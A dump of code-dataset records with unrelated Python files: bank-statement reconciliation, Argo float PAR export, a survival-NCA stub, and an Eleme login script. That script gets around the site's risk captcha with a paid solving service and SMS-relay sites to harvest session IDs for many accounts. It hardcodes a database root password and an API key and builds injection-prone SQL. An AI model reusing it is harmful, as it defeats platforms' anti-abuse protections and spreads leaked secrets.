self.nc_ceb['摘要'].str.match(regex_pay_reimburse)\r\n nc_pay_reimburse = self.nc_ceb[is_pay_reimburse]\r\n print(nc_pay_reimburse)\r\n for nc_idx in nc_pay_reimburse.index:\r\n cond1 = (self.ceb['支出']==self.nc_ceb.loc[nc_idx,'贷方']) #借贷金额相同\r\n cond2 = (self.ceb['用途'].str.contains('报销'))\r\n ceb_pay_reimburse = self.ceb[(cond1&cond2)]\r\n\r\n for idx in ceb_pay_reimburse.index:\r\n otherside_cond = (ceb_pay_reimburse.loc[idx,'对方户名'] in self.nc_ceb.loc[nc_idx,'摘要'])\r\n if otherside_cond: # 对方单位为 nc摘要中的姓名/公司\r\n self.nc_ceb.loc[nc_idx,'对账一致'] = 'yes'\r\n self.ceb.loc[idx,'对账一致'] = 'yes' \r\n self.nc_ceb.loc[nc_idx,'银行索引'] = idx\r\n self.ceb.loc[idx,'NC索引'] = nc_idx \r\n\r\n\r\n def pay_loans(self):\r\n '''\r\n 支付借款\r\n eg: \r\n 支付yuanquan-袁泉借F0403-因公临时借款JK-190903-000138\r\n \r\n rule:\r\n 1. 借贷金额相同\r\n 2. 
def pay_loans(self):\r\n        '''\r\n        Loan paid out to an employee.\r\n        eg (NC summary):\r\n            支付yuanquan-袁泉借F0403-因公临时借款JK-190903-000138\r\n\r\n        rule:\r\n            1. the NC credit amount equals the bank debit amount\r\n            2. the bank counterparty name (e.g. 袁泉) appears in the NC summary\r\n        '''\r\n\r\n        regex_pay_loans = re.compile(r'支付.*借.*借款.*')\r\n        is_pay_loans = self.nc_ceb['摘要'].str.match(regex_pay_loans)\r\n        nc_pay_loans = self.nc_ceb[is_pay_loans]\r\n\r\n        for nc_idx in nc_pay_loans.index:\r\n            cond1 = (self.ceb['支出'] == self.nc_ceb.loc[nc_idx,'贷方']) # amounts match\r\n            ceb_pay_loans = self.ceb[(cond1)]\r\n\r\n            for idx in ceb_pay_loans.index:\r\n                otherside_cond = (ceb_pay_loans.loc[idx,'对方户名'] in self.nc_ceb.loc[nc_idx,'摘要'])\r\n                if otherside_cond: # counterparty is the person named in the NC summary\r\n                    self.nc_ceb.loc[nc_idx,'对账一致'] = 'yes'\r\n                    self.ceb.loc[idx,'对账一致'] = 'yes'\r\n                    self.nc_ceb.loc[nc_idx,'银行索引'] = idx\r\n                    self.ceb.loc[idx,'NC索引'] = nc_idx\r\n\r\n    def pay_bidbond(self):\r\n        '''\r\n        Refund of bid bonds (tender deposits).\r\n        eg:\r\n        nc——\r\n            退还投标保证金  150000\r\n            退还投标保证金  20000\r\n\r\n        bank——\r\n            交易日期      借方发生额  贷方发生额  账户余额     摘要\r\n            2019-09-06   20000               2276075.58  退投标保证金\r\n            2019-09-06            20000      2296075.58  账号不存在;原交易流水号:901304015643;\r\n            2019-09-06   20000               2276075.58  退投标保证金\r\n            2019-09-06   -20000              2389319.18  网银跨行汇款失败,收款行拒绝原因:账号解析失败\r\n            2019-09-06   20000               2369319.18  退投标保证金\r\n            2019-09-06   50000               2389319.18  退投标保证金\r\n            2019-09-06   50000               2439319.18  退投标保证金\r\n            2019-09-06   50000               2489319.18  退投标保证金\r\n\r\n        rule:\r\n        > aggregate both sides instead of matching row by row\r\n\r\n        1. the bank summary contains 退投标保证金 / 账号不存在 / 汇款失败\r\n        2. sum the NC credit amounts\r\n        3. sum the bank debit amounts\r\n        4. sum the bank credit amounts\r\n        5. (3) minus (4) must equal (2)\r\n        '''\r\n        is_bidbond = self.nc_ceb['摘要'].str.contains(\"退还投标保证金\")\r\n        nc_bidbond = self.nc_ceb[is_bidbond]\r\n\r\n        purpose_cond1 = self.ceb['用途'].str.contains(\"退投标保证金\")\r\n        purpose_cond2 = self.ceb['用途'].str.contains(\"账号不存在|汇款失败\")\r\n\r\n        # try two scopes, so that '账号不存在' rows belonging to other cases are not swept in by mistake\r\n        ceb_bidbond = self.ceb[(purpose_cond1|purpose_cond2)]\r\n        ceb_sum = ceb_bidbond['支出'].sum()-ceb_bidbond['收入'].sum()\r\n\r\n        ceb_bidbond_ = self.ceb[purpose_cond1]\r\n        ceb_sum_ = ceb_bidbond_['支出'].sum()-ceb_bidbond_['收入'].sum()\r\n\r\n        if nc_bidbond['贷方'].sum() == ceb_sum:\r\n            self.nc_ceb.loc[nc_bidbond.index,'对账一致'] = 'yes'\r\n            self.ceb.loc[ceb_bidbond.index,'对账一致'] = 'yes'\r\n            self.nc_ceb.loc[nc_bidbond.index,'银行索引'] = ';'.join(map(str,ceb_bidbond.index.values))\r\n            self.ceb.loc[ceb_bidbond.index,'NC索引'] = ';'.join(map(str,nc_bidbond.index.values))\r\n\r\n        elif nc_bidbond['贷方'].sum() == ceb_sum_:\r\n            self.nc_ceb.loc[nc_bidbond.index,'对账一致'] = 'yes'\r\n            self.ceb.loc[ceb_bidbond_.index,'对账一致'] = 'yes'\r\n            self.nc_ceb.loc[nc_bidbond.index,'银行索引'] = ';'.join(map(str,ceb_bidbond_.index.values))\r\n            self.ceb.loc[ceb_bidbond_.index,'NC索引'] = ';'.join(map(str,nc_bidbond.index.values))\r\n\r\n    
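# Worked example (added), reading the failed-transfer rows in the docstring sample as\r\n    # money flowing back: the bank debits net to 20000+20000-20000+20000+50000*3 = 190000,\r\n    # the bank credits total 20000, so 190000 - 20000 = 170000, which equals the NC credit\r\n    # total 150000 + 20000 = 170000 -> every row on both sides gets marked 'yes'.\r\n\r\n    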
def export_excel(self):\r\n        nc_rows_counts = self.nc_ceb['对账一致'].value_counts(dropna=False)\r\n        ceb_rows_counts = self.ceb['对账一致'].value_counts(dropna=False)\r\n\r\n        try:\r\n            nc_yes_rows = nc_rows_counts['yes']\r\n        except KeyError:\r\n            nc_yes_rows = 0\r\n        nc_notmatch_rows = nc_rows_counts.sum()-nc_yes_rows\r\n\r\n        try:\r\n            ceb_yes_rows = ceb_rows_counts['yes']\r\n        except KeyError:\r\n            ceb_yes_rows = 0\r\n        ceb_notmatch_rows = ceb_rows_counts.sum()-ceb_yes_rows\r\n\r\n\r\n        print('\\n')\r\n        print(\"+--------------------------------------------------+\")\r\n        print(\"¦                     RESULTS                      ¦\")\r\n        print(\"+--------------------------------------------------+\")\r\n        print(\"¦  EXCEL   ¦      NC_CEB      ¦        CEB         ¦\")\r\n        print(\"+--------------------------------------------------+\")\r\n        print(\"¦  TOTAL   ¦{0:^18}¦{1:^20}¦\".format(nc_rows_counts.sum(),ceb_rows_counts.sum()))\r\n        print(\"+--------------------------------------------------+\")\r\n        print(\"¦  MATCH   ¦{0:^18}¦{1:^20}¦\".format(nc_yes_rows,ceb_yes_rows))\r\n        print(\"+--------------------------------------------------+\")\r\n        print(\"¦ NOTMATCH ¦{0:^18}¦{1:^20}¦\".format(nc_notmatch_rows,ceb_notmatch_rows))\r\n        print(\"+--------------------------------------------------+\")\r\n        print('\\n')\r\n\r\n\r\n        self.nc_ceb['交易日期'] = self.nc_ceb['交易日期'].astype(str).str.slice(0,10)\r\n        self.ceb['交易日期'] = self.ceb['交易日期'].astype(str).str.slice(0,10)\r\n\r\n\r\n        save_file = self.save_path + '\\\\' + self.nc_file_name + '+' + self.ceb_file_name + '.xlsx'\r\n        print(\"结果保存至:\\n\\t%s\\n\" %(save_file))\r\n        # self.nc_ceb.to_excel(self.save_path + '/nc_ceb.xlsx')\r\n        # self.ceb.to_excel(self.save_path + '/ceb.xlsx')\r\n        writer = pd.ExcelWriter(save_file,engine='xlsxwriter')\r\n        self.nc_ceb.to_excel(writer,sheet_name=self.nc_file_name,startrow=1,startcol=1,header=False,index=False)\r\n        self.ceb.to_excel(writer,sheet_name=self.ceb_file_name,startrow=1,startcol=1,header=False,index=False)\r\n\r\n        workbook = writer.book\r\n        nc_sheet = writer.sheets[self.nc_file_name]\r\n        ceb_sheet = writer.sheets[self.ceb_file_name]\r\n\r\n        header_format = workbook.add_format({\r\n            \"bold\":True,\r\n            \"bg_color\":'#67d8ef',\r\n            'font_size':15,\r\n            'font_name':\"微软雅黑\",\r\n            \"align\":'center',\r\n            'border':2,\r\n        })\r\n        cell_format = workbook.add_format({\r\n            \"font_size\":12,\r\n            \"font_name\":\"微软雅黑\",\r\n            \"border\":1,\r\n            \"border_color\":'#67d8ef',\r\n            \"align\":\"left\",\r\n        })\r\n\r\n        yes_format = workbook.add_format({\r\n            \"bg_color\":\"#ffff00\",\r\n            \"font_size\":12,\r\n            \"font_name\":\"微软雅黑\",\r\n            \"border\":1,\r\n            \"border_color\":'#67d8ef',\r\n            \"align\":\"left\"\r\n        })\r\n\r\n        # nc sheet\r\n        # row format\r\n        nc_rows,nc_cols = self.nc_ceb.shape\r\n        for i in range(nc_rows+5):\r\n            nc_sheet.set_row(i,22,cell_format)\r\n\r\n        yes_index = self.nc_ceb[self.nc_ceb['对账一致']=='yes'].index+1\r\n        for i in yes_index:\r\n            nc_sheet.set_row(i,22,yes_format)\r\n\r\n        # col format\r\n        nc_sheet.set_column(0,nc_cols+5,22)\r\n\r\n        nc_sheet.write_row('B1',self.nc_ceb.columns,header_format)\r\n        nc_sheet.write_column('A2',self.nc_ceb.index,header_format)\r\n        nc_sheet.freeze_panes(1,1)\r\n        nc_sheet.set_tab_color('#FF9900')\r\n\r\n        # ceb sheet\r\n        # row format\r\n        ceb_rows,ceb_cols = self.ceb.shape\r\n        for i in range(ceb_rows+5):\r\n            ceb_sheet.set_row(i,22,cell_format)\r\n\r\n        yes_index = self.ceb[self.ceb['对账一致']=='yes'].index+1\r\n        for i in yes_index:\r\n            ceb_sheet.set_row(i,22,yes_format)\r\n\r\n        # col format\r\n        ceb_sheet.set_column(0,ceb_cols+5,22)\r\n\r\n        ceb_sheet.write_row('B1',self.ceb.columns,header_format)\r\n        ceb_sheet.write_column('A2',self.ceb.index,header_format)\r\n        ceb_sheet.freeze_panes(1,1)\r\n        ceb_sheet.set_tab_color('#FF9900')\r\n\r\n        writer.save()\r\n\r\n\r\n    def doall(self):\r\n        self.rec_loans()\r\n        self.prepay_firmamount()\r\n        self.pay_reimburse()\r\n        self.pay_loans()\r\n        self.pay_bidbond()\r\n\r\n        self.export_excel()\r\n\r\n    def __call__(self):\r\n        return self.doall()","sub_path":"projects/AutoRecon/reconciliationCEB.py","file_name":"reconciliationCEB.py","file_ext":"py","file_size_in_byte":19252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"51598526","text":"import requests\nimport time\nfrom bs4 import BeautifulSoup\nimport traceback\nimport re\nimport sqlite3\nimport pymysql\nfrom PIL import Image\nimport base64\n\n# Scan the eleme account table for accounts marked as not logged in, then obtain a fresh sid by entering the verification codes manually\n\nHEADERS = {\n    'User-Agent': 'Mozilla/5.0 (Linux; Android 6.0; PRO 6 Build/MRA58K; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49'\n                  ' Mobile MQQBrowser/6.2 TBS/043221 Safari/537.36 V1_AND_SQ_7.0.0_676_YYB_D QQ/7.0.0.3135 NetType/WIFI WebP/0.3.0 Pixel/1080'\n}\n
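# NOTE (added): `proxies` below is never passed to any requests call in the code shown;\n# to actually route traffic through the proxy one would add `proxies=proxies` to the\n# requests.get/requests.post invocations.\n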
proxy = '27.152.90.115:9999'\nproxies = {\n    'http': 'http://' + proxy,\n    'https': 'https://' + proxy\n}\nis_input = True\n\nconn = pymysql.connect(host='122.51.67.37', user='root', password='mm123456', port=3306, db='eleme')\ncursor = conn.cursor()\n\ndef mobile_send_code(mobile, sms_url): # ask eleme to send an SMS verification code to the given mobile number\n    dict = {\"scf\": \"ms\", \"mobile\": \"{}\".format(mobile)}\n    mobile_send_code_url = 'https://h5.ele.me/restapi/eus/login/mobile_send_code'\n    try:\n        r = requests.post(mobile_send_code_url, headers=HEADERS, data=dict, timeout=25,)\n        if r.status_code == 400 and r.json()['message'] == '账户存在风险,需要图形验证码':\n            while True:\n                result = captcha_yz(mobile)\n                if result['status'] == 0:\n                    # keep looping until the image captcha is accepted\n                    if result['message'].status_code == 400 and result['message'].json()['message'] == '图形验证码错误':\n                        print('[{}]{},请重新输入'.format(mobile, result['message'].json()['message']))\n                        time.sleep(5)\n                    elif result['message'].status_code == 200 and 'validate_token' in result['message'].json():\n                        print('[{}]验证码校验成功,短信已发送,请查看手机验证码'.format(mobile))\n                        # time.sleep(15) # wait 15 seconds so the SMS has surely arrived\n                        # result = login_by_mobile(result['message'].json()['validate_token'], mobile, sms_url,\n                        #                          )\n                        result = login_by_mobile_sd(result['message'].json()['validate_token'], mobile, sms_url,\n                                                    )\n                        return result\n                    else:\n                        result = {'status': 1, 'message': '1-获取短信验证码出错,{}'.format(\n                            result['message'].json())} # usually means the anti-abuse throttle fired; a proxy could be added here later, e.g. {\"message\":\"您的操作太快了,请明天再来吧\",\"name\":\"HERMES_CLIENT_ERROR\"} 400\n                        return result\n                elif result['status'] == 1:\n                    pass\n                else:\n                    return result\n        else:\n            if r.status_code == 200 and 'validate_token' in r.json():\n                print('[{}]短信已发送,请查看手机验证码'.format(mobile))\n                # time.sleep(40) # wait so the SMS has surely arrived\n                # result = login_by_mobile(r.json()['validate_token'], mobile, sms_url)\n                result = login_by_mobile_sd(r.json()['validate_token'], mobile, sms_url)\n                return result\n            else:\n                result = {'status': 1, 'message': '2-获取短信验证码出错,{}'.format(r.json())}\n                return result\n    except:\n        result = {'status': -1, 'message': 'Error :{}'.format(traceback.format_exc())}\n        return result\n\ndef login_by_mobile_sd(validate_token, mobile, sms_url): # log in with a manually typed SMS code and store the fresh sid\n    validate_code = input(\"{} 请手动输入验证码: \".format(sms_url))\n    if validate_code == 'no':\n        result = {'status': -1, 'message': '取消获取'}\n        return result\n    print('[{}]短信验证码识别成功,验证码为{}'.format(mobile, validate_code))\n    dict = {\"mobile\": \"{}\".format(mobile), \"validate_token\": \"{}\".format(validate_token),\n            \"validate_code\": \"{}\".format(validate_code)}\n    login_by_mobile_url = 'https://h5.ele.me/restapi/eus/login/login_by_mobile'\n    r = requests.post(login_by_mobile_url, headers=HEADERS, data=dict, timeout=25)\n    if r.status_code == 200:\n        if 'SID' in r.cookies and 'USERID' in r.cookies:\n            SID = r.cookies['SID']\n            users_id = r.cookies['USERID']\n            print('[{}]获取成功,新的SID为[{}],userid为[{}]'.format(mobile, SID, users_id))\n            result = {'status': 0, 'sid': SID}\n            cursor.execute(\n                \"UPDATE eleme_id SET sid = '{}', users_id = '{}' ,is_sx = '身份信息正常' WHERE mobile = '{}'\".format(SID,\n                                                                                                             users_id,\n                                                                                                             mobile))\n            conn.commit()\n            print('[{}]新的SID已写入成功_eleme_id'.format(mobile))\n            return result\n        else:\n            result = {'status': 1, 'message': '未找到,sid获取出错~{},{}'.format(r.text, r.cookies)}\n            return result\n    else:\n        result = {'status': -1, 'message': '{}'.format(r.text)}\n        return result\n\n
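# NOTE (added): the UPDATE statements in this module interpolate values directly into\n# SQL; with pymysql a parameterized query is the safer equivalent, e.g.:\n#   cursor.execute(\"UPDATE eleme_id SET sid=%s, users_id=%s, is_sx=%s WHERE mobile=%s\",\n#                  (SID, users_id, '身份信息正常', mobile))\n\n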
def login_by_mobile(validate_token, mobile, sms_url): # once the SMS code is available, log in and extract the newest sid (identity token)\n    try:\n        if len(sms_url) != 0: # an empty sms_url means the number is not from an online SMS-relay platform, so the code must be typed in manually\n            print('[{}]正在获取短信验证码'.format(mobile))\n            html = requests.get(sms_url, headers=HEADERS, timeout=25)\n            if html.status_code == 200:\n                Soup = BeautifulSoup(html.content, 'lxml')\n                # print(aSoup)\n                trList = Soup.find_all(name='tbody')[0].find_all(name='tr')\n                if trList:\n                    for tr in trList:\n                        tdContent = tr.find_all(name='td')[2].string\n                        if '【饿了么】' in tdContent:\n                            validate_code = re.findall('验证码是(.*?),', tdContent, re.S)[0]\n                            print('[{}]短信验证码识别成功,验证码为{}'.format(mobile, validate_code))\n                            dict = {\"mobile\": \"{}\".format(mobile), \"validate_token\": \"{}\".format(validate_token),\n                                    \"validate_code\": \"{}\".format(validate_code)}\n                            login_by_mobile_url = 'https://h5.ele.me/restapi/eus/login/login_by_mobile'\n                            r = requests.post(login_by_mobile_url, headers=HEADERS, data=dict, timeout=25)\n                            if r.status_code == 200:\n                                if 'SID' in r.cookies and 'USERID' in r.cookies:\n                                    SID = r.cookies['SID']\n                                    users_id = r.cookies['USERID']\n                                    print('[{}]获取成功,新的SID为[{}],userid为[{}]'.format(mobile, SID, users_id))\n                                    result = {'status': 0, 'sid': SID}\n                                    cursor.execute(\n                                        \"UPDATE eleme_id SET sid = '{}', users_id = '{}' ,is_sx = '身份信息正常' WHERE mobile = '{}'\".format(SID, users_id, mobile))\n                                    conn.commit()\n                                    print('[{}]新的SID已写入成功_eleme_id'.format(mobile))\n                                    return result\n                                else:\n                                    result = {'status': 1, 'message': '未找到,sid获取出错~{},{}'.format(r.text, r.cookies)}\n                                    return result\n                            else:\n                                result = {'status': 1, 'message': '短信验证出错~{}'.format(\n                                    r.text)} # usually the SMS code was wrong: the newest eleme SMS on the relay site was not the one triggered 15s earlier, e.g. because someone else used the same number\n                                return result\n                        else:\n                            result = {'status': 1, 'message': '未找到饿了么短信,sms链接:{}'.format(sms_url)}\n                            return result\n                else:\n                    result = {'status': 1, 'message': 'trList列表为空'}\n                    return result\n            else:\n                result = {'status': 1, 'message': '接码平台地址访问出错了~{},sms链接:{}'.format(html.status_code, sms_url)}\n                return result\n    except:\n        result = {'status': 1, 'message': 'Error: {}'.format(traceback.format_exc())}\n        return result\n\ndef captcha_yz(mobile): # handle the image captcha that may appear when requesting the SMS code\n    captcha_url = 'https://h5.ele.me/restapi/eus/v3/captchas'\n    mobile_send_code_url = 'https://h5.ele.me/restapi/eus/login/mobile_send_code'\n    captcha_dict = {\"captcha_str\": \"{}\".format(mobile)}\n    try:\n        r = requests.post(captcha_url, headers=HEADERS, data=captcha_dict,\n                          timeout=25)\n        if r.status_code == 200:\n            if is_input:\n                captcha_hash = r.json()['captcha_hash']\n                imgbase64 = r.json()['captcha_image'].split(',')[-1]\n                imagedata = base64.b64decode(imgbase64)\n                file = open('captcha.jpg', \"wb\")\n                file.write(imagedata)\n                file.close()\n                img = Image.open('captcha.jpg')\n                img.show()\n                time.sleep(2)\n                captcha = input(\"请手动输入验证码: \")\n                captcha_dict1 = {\"scf\": \"ms\", \"mobile\": \"{}\".format(mobile),\n                                 \"captcha_hash\": \"{}\".format(captcha_hash), \"captcha_value\": \"{}\".format(captcha), }\n                r2 = requests.post(mobile_send_code_url, headers=HEADERS, data=captcha_dict1,\n                                   timeout=25)\n                result = {'status': 0, 'message': r2}\n                return result\n            else:\n                captcha_hash = r.json()['captcha_hash']\n                imgbase64 = r.json()['captcha_image'].split(',')[-1]\n                print('[{}]正在识别验证码'.format(mobile))\n                cap_url = 'http://www.damagou.top/apiv1/recognize.html'\n                cap_dict = {\n                    'image': imgbase64,\n                    'userkey': '3079cdcefb0b4b2bad8e6e8ab7786df5',\n                    'type': '1001'\n                }\n                cap_r = requests.post(cap_url, data=cap_dict)\n                captcha = cap_r.text\n                if len(captcha) == 4:\n                    print('[{}]验证码识别成功,验证码为:{}'.format(mobile, captcha))\n                    time.sleep(5)\n                    captcha_dict1 = {\"scf\": \"ms\", \"mobile\": \"{}\".format(mobile),\n                                     \"captcha_hash\": \"{}\".format(captcha_hash), \"captcha_value\": \"{}\".format(captcha)}\n                    r2 = requests.post(mobile_send_code_url, 
headers=HEADERS, data=captcha_dict1,\n timeout=25)\n result = {'status': 0, 'message': r2}\n return result\n else:\n print('[{}]验证码识别错误,识别到的内容为:{}'.format(mobile, captcha))\n time.sleep(5)\n result = {'status': 1}\n return result\n else:\n result = {'status': 2, 'message': '图形验证码获取出错~{},{}'.format(r.status_code, r.text)}\n return result\n except:\n result = {'status': 2, 'message': 'Error :{}'.format(traceback.format_exc())}\n return result\n\ncursor.execute(\"select mobile, sms_url from eleme_id where is_sx = '未登录'\")\nis_sxs = cursor.fetchall()\nfor i in range(len(is_sxs)):\n print('---------本次共有{}个手机号需验证,当前为第{}个---------'.format(len(is_sxs), i+1))\n result = mobile_send_code(is_sxs[i][0], is_sxs[i][1])\n if result['status'] == 0:\n print('新sid获取成功,sid为:{}'.format(result['sid']))\n elif result['status'] == -1:\n print(result)\n else:\n print(result)\n message = result['message'].replace(\"'\", '')\n if '您的帐号存在风险,为保护您的财产安全已冻结' in message:\n cursor.execute(\n \"UPDATE eleme_id SET is_sx = '账号已被冻结', sms_url = '账号已被冻结' WHERE mobile = '{}'\".format(is_sxs[i][0]))\n conn.commit()\n else:\n cursor.execute(\n \"UPDATE eleme_id SET is_sx = '{}' WHERE mobile = '{}'\".format(message, is_sxs[i][0]))\n conn.commit()\n# print(is_sxs)","sub_path":"backup_py/wxBot/eleme/login/get_mob_identity.py","file_name":"get_mob_identity.py","file_ext":"py","file_size_in_byte":12920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"636055644","text":"import argparse\ndef argument():\n parser = argparse.ArgumentParser(description = '''\n Creates superfloat files of downwelling PAR.\n Reads from Coriolis.\n ''', formatter_class=argparse.RawTextHelpFormatter)\n\n\n parser.add_argument( '--datestart','-s',\n type = str,\n required = False,\n help = '''date in yyyymmdd format''')\n parser.add_argument( '--dateend','-e',\n type = str,\n required = False,\n help = '''date in yyyymmdd format ''')\n parser.add_argument( '--outdir','-o',\n type = str,\n required = True,\n default = \"/gpfs/scratch/userexternal/gbolzon0/SUPERFLOAT/\",\n help = 'path of the Superfloat dataset ')\n parser.add_argument( '--force', '-f',\n action='store_true',\n help = \"\"\"Overwrite existing files\n \"\"\")\n parser.add_argument( '--update_file','-u',\n type = str,\n required = False,\n default = 'NO_file',\n help = '''file with updated floats''')\n return parser.parse_args()\n\nargs = argument()\n\nif (args.datestart == 'NO_data') & (args.dateend == 'NO_data') & (args.update_file == 'NO_file'):\n raise ValueError(\"No file nor data inserted: you have to pass either datastart and dataeend or the update_file\")\n\nif ((args.datestart == 'NO_data') or (args.dateend == 'NO_data')) & (args.update_file == 'NO_file'):\n raise ValueError(\"No file nor data inserted: you have to pass both datastart and dataeend\")\n\n\nfrom instruments import bio_float\nfrom commons.time_interval import TimeInterval\nfrom basins.region import Rectangle\nimport superfloat_generator\nfrom commons.utils import addsep\nimport os\nimport scipy.io.netcdf as NC\nimport numpy as np\nimport datetime\n\nclass Metadata():\n def __init__(self, filename):\n self.filename = filename\n self.status_var = 'n'\n\n\n\ndef dump_par_file(outfile, p, Pres, Value, Qc, metadata, mode='w'):\n nP=len(Pres)\n if mode=='a':\n command = \"cp %s %s.tmp\" %(outfile,outfile)\n os.system(command)\n ncOUT = NC.netcdf_file(outfile + \".tmp\" ,mode)\n\n if mode=='w': # if not existing file, we'll put header, TEMP, PSAL\n setattr(ncOUT, 'origin' , 
'coriolis')\n        setattr(ncOUT, 'file_origin', metadata.filename)\n        PresT, Temp, QcT = p.read('TEMP', read_adjusted=False)\n        PresT, Sali, QcS = p.read('PSAL', read_adjusted=False) \n        ncOUT.createDimension(\"DATETIME\",14)\n        ncOUT.createDimension(\"NPROF\", 1)\n        ncOUT.createDimension('nTEMP', len(PresT))\n        ncOUT.createDimension('nPSAL', len(PresT))\n\n        ncvar=ncOUT.createVariable(\"REFERENCE_DATE_TIME\", 'c', (\"DATETIME\",))\n        ncvar[:]=p.time.strftime(\"%Y%m%d%H%M%S\")\n        ncvar=ncOUT.createVariable(\"JULD\", 'd', (\"NPROF\",))\n        ncvar[:]=0.0\n        ncvar=ncOUT.createVariable(\"LONGITUDE\", \"d\", (\"NPROF\",))\n        ncvar[:] = p.lon.astype(np.float64)\n        ncvar=ncOUT.createVariable(\"LATITUDE\", \"d\", (\"NPROF\",))\n        ncvar[:] = p.lat.astype(np.float64)\n\n        ncvar=ncOUT.createVariable('TEMP','f',('nTEMP',))\n        ncvar[:]=Temp\n        setattr(ncvar, 'variable' , 'TEMP')\n        setattr(ncvar, 'units' , \"degree_Celsius\")\n        ncvar=ncOUT.createVariable('PRES_TEMP','f',('nTEMP',))\n        ncvar[:]=PresT\n        ncvar=ncOUT.createVariable('TEMP_QC','f',('nTEMP',))\n        ncvar[:]=QcT\n\n        ncvar=ncOUT.createVariable('PSAL','f',('nTEMP',))\n        ncvar[:]=Sali\n        setattr(ncvar, 'variable' , 'SALI')\n        setattr(ncvar, 'units' , \"PSS78\")\n        ncvar=ncOUT.createVariable('PRES_PSAL','f',('nTEMP',))\n        ncvar[:]=PresT\n        ncvar=ncOUT.createVariable('PSAL_QC','f',('nTEMP',))\n        ncvar[:]=QcS\n\n    print(\"dumping par on \" + outfile, flush=True)\n    par_already_existing=\"nDOWNWELLING_PAR\" in ncOUT.dimensions.keys() # check the dimension actually written below; the old \"nPAR\" test never matched, so append mode would re-create the dimension\n    if not par_already_existing : ncOUT.createDimension('nDOWNWELLING_PAR', nP)\n    ncvar=ncOUT.createVariable(\"PRES_DOWNWELLING_PAR\", 'f', ('nDOWNWELLING_PAR',))\n    ncvar[:]=Pres\n    ncvar=ncOUT.createVariable(\"DOWNWELLING_PAR\", 'f', ('nDOWNWELLING_PAR',))\n    ncvar[:]=Value\n    setattr(ncvar, 'status_var' , metadata.status_var)\n    setattr(ncvar, 'variable' , 'DOWNWELLING_PAR')\n    setattr(ncvar, 'units' , \"microMoleQuanta/m^2/sec\")\n    setattr(ncvar, 'longname' , 'Downwelling photosynthetic available radiation')\n    ncvar=ncOUT.createVariable(\"DOWNWELLING_PAR_QC\", 'f', ('nDOWNWELLING_PAR',))\n    ncvar[:]=Qc\n    ncOUT.close()\n\n    os.system(\"mv \" + outfile + \".tmp \" + outfile)\n\ndef get_outfile(p,outdir):\n    wmo=p._my_float.wmo\n    filename=\"%s%s/%s\" %(outdir,wmo, os.path.basename(p._my_float.filename))\n    return filename\n\n\ndef par_algorithm(pCor, outfile, metadata,writing_mode):\n    os.system('mkdir -p ' + os.path.dirname(outfile))\n    metadata.status_var = pCor._my_float.status_var('DOWNWELLING_PAR')\n    if metadata.status_var in ['A', 'D']:\n        Pres, Value, Qc = pCor.read('DOWNWELLING_PAR', read_adjusted=True)\n    else:\n        Pres, Value, Qc = pCor.read('DOWNWELLING_PAR', read_adjusted=False)\n    if Pres is None: return\n    if len(Pres)<5:\n        print(\"few values in Coriolis for PAR in \" + pCor._my_float.filename, flush=True)\n        return\n    dump_par_file(outfile, pCor, Pres, Value, Qc, metadata,mode=writing_mode)\n\nOUTDIR = addsep(args.outdir)\ninput_file=args.update_file\nif input_file == 'NO_file':\n\n    TI = TimeInterval(args.datestart,args.dateend,'%Y%m%d')\n    R = Rectangle(-6,36,30,46)\n\n    PROFILES_COR =bio_float.FloatSelector('DOWNWELLING_PAR', TI, R)\n\n    wmo_list= bio_float.get_wmo_list(PROFILES_COR)\n    wmo_list.sort()\n\n\n    for wmo in wmo_list:\n        print(wmo, flush=True)\n        Profilelist=bio_float.filter_by_wmo(PROFILES_COR, wmo)\n        for ip, pCor in enumerate(Profilelist):\n            outfile = get_outfile(pCor,OUTDIR)\n            writing_mode=superfloat_generator.writing_mode(outfile)\n            \n            condition_to_write = ~superfloat_generator.exist_valid_variable('DOWNWELLING_PAR',outfile)\n            if args.force: 
condition_to_write=True\n if not condition_to_write: continue\n\n metadata = Metadata(pCor._my_float.filename)\n par_algorithm(pCor, outfile, metadata, writing_mode)\n\n\nelse:\n INDEX_FILE=superfloat_generator.read_float_update(input_file)\n\n nFiles=INDEX_FILE.size\n\n for iFile in range(nFiles):\n timestr = INDEX_FILE['date'][iFile].decode()\n lon = INDEX_FILE['longitude' ][iFile]\n lat = INDEX_FILE['latitude' ][iFile]\n filename = INDEX_FILE['file_name'][iFile].decode()\n available_params = INDEX_FILE['parameters'][iFile].decode()\n parameterdatamode= INDEX_FILE['parameter_data_mode'][iFile].decode()\n float_time = datetime.datetime.strptime(timestr,'%Y%m%d%H%M%S')\n filename=filename.replace('coriolis/','').replace('profiles/','')\n\n if 'DOWNWELLING_PAR' in available_params:\n pCor=bio_float.profile_gen(lon, lat, float_time, filename, available_params,parameterdatamode)\n outfile = get_outfile(pCor,OUTDIR)\n writing_mode=superfloat_generator.writing_mode(outfile)\n\n metadata = Metadata(pCor._my_float.filename)\n par_algorithm(pCor, outfile, metadata, writing_mode)\n\n\n","sub_path":"Float/superfloat_par.py","file_name":"superfloat_par.py","file_ext":"py","file_size_in_byte":7698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"136289574","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Aug 27 01:56:26 2017\n\n@author: mohamed\n\nSurvival NCA (Neighborhood Component Analysis)\n\"\"\"\n\n# Append relevant paths\nimport os\nimport sys\n\ndef conditionalAppend(Dir):\n \"\"\" Append dir to sys path\"\"\"\n if Dir not in sys.path:\n sys.path.append(Dir)\n\ncwd = os.getcwd()\nconditionalAppend(cwd)\n\nimport _pickle\nimport numpy as np\nimport tensorflow as tf\n#from scipy.io import loadmat, savemat\n#from matplotlib import cm\n#import matplotlib.pylab as plt\n\nimport logging\nimport datetime\n\nimport ProjectUtils as pUtils\nimport SurvivalUtils as sUtils\nimport DataManagement as dm\nimport NCA_graph_experimental as cgraph\n\n#raise(Exception)\n\n#%%============================================================================\n# NCAmodel class (trainable model)\n#==============================================================================\n\nclass SurvivalNCA(object):\n \n \"\"\"\n Extension of NCA to right-censored settings.\n \n Key references: \n \n 1- J Goldberger, GE Hinton, ST Roweis, RR Salakhutdinov. \n Neighbourhood components analysis. \n Advances in neural information processing systems, 513-520\n \n 2- Yang, W., K. Wang, W. Zuo. \n Neighborhood Component Feature Selection for High-Dimensional Data.\n Journal of Computers. Vol. 
